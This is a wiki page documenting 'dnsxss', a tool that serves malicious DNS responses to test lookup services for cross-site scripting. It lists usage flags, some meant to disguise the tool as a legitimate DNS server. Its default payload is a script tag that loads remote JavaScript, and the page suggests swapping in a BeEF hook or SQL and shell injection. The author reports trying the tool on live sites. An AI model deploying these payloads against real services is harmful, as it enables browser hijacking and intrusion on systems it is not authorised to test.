Difference between revisions of "Dnsxss"
| Line 74: | Line 74: | ||
of benefits. If you aren't sure whether or not you're the authority, you | of benefits. If you aren't sure whether or not you're the authority, you | ||
can use the --test argument to this program, or you can directly run the | can use the --test argument to this program, or you can directly run the | ||
[[ | [[dnstest]] program, also included. | ||
Latest revision as of 16:08, 21 February 2010
Intro
dnsxss is designed to send back malicious responses to DNS queries in order to test DNS lookup servers for common classes of vulnerabilities. By default, dnsxss returns a string containing some Javascript code to all MX, CNAME, NS, and TEXT requests, in the hopes that the DNS lookup will be displayed in a browser.
When I originally wrote this, I tested it on a handful of Internet sites. Every one of them was vulnerable.
I haven't tried testing other vulnerabilities, like SQL injection or shell injection, but I suspect that this is a great attack vector for those and other vulnerabilities, because people don't realize that malicious traffic can be returned.
Usage
./dnsxss [-t <test string>]
-a <address>
The address sent back to the user when an A request is made. Can be used
to disguise this as a legitimate DNS server. Default: 127.0.0.1.
-aaaa <address>
The address sent back to the user when an AAAA (IPv6) request is made. Can
be used to disguise this as a legitimate DNS server. Default: ::1.
-d <domain>
The domain to put after the test string. It should be the same as the
one that points to your host.
-h
Help
--payload <data>
The string containing the HTML characters, that will ultimately test for
the cross-site scripting vulnerability. Ultimately, this can contain any
type of attack, such as sql-injection. One thing to note is that DNS
generally seems to filter certain characters; in my testing, anything with
an ASCII code of 0x20 (Space) or lower was replaced with an escaped
/xxx, and brackets had a backslash added before them.
Default:
<script src='http://www.skullsecurity.org/test-js.js'></script>
Note that unless a TEXT record is requested, spaces are replaced with
slashes ('/'), which work in Firefox but not IE.
--keep-spaces
By default, spaces in the payload are replaced with slashes ('/') because
the DNS protocol doesn't like spaces. Use this flag to bypass that
filter.
--test <domain>
Test to see if we are the authoritative nameserver for the given domain.
-u --username
The username to use when dropping privileges. Default: nobody.
-s --source <address>
The local address to bind to. Default: any (0.0.0.0)
-p --port <port>
The local port to listen on. I don't recommend changing this.
default: 53
Examples
Running this program without arguments returns a pretty typical cross-site scripting string:
$ dig @localhost -t TXT test [...] ;; ANSWER SECTION: test. 1 IN TXT "<script src='http://www.skullsecurity.org/test-js.js'></script>.test"
This will display a messagebox on the user's screen alerting them to the issue. You can change the payload using the --payload argument and point it at, for example, a BeEF server.
Authoritative DNS server
Many functions of this tool require you to be the authoritative nameserver for a domain. This typically costs money, but is fairly cheap and has a lot of benefits. If you aren't sure whether or not you're the authority, you can use the --test argument to this program, or you can directly run the dnstest program, also included.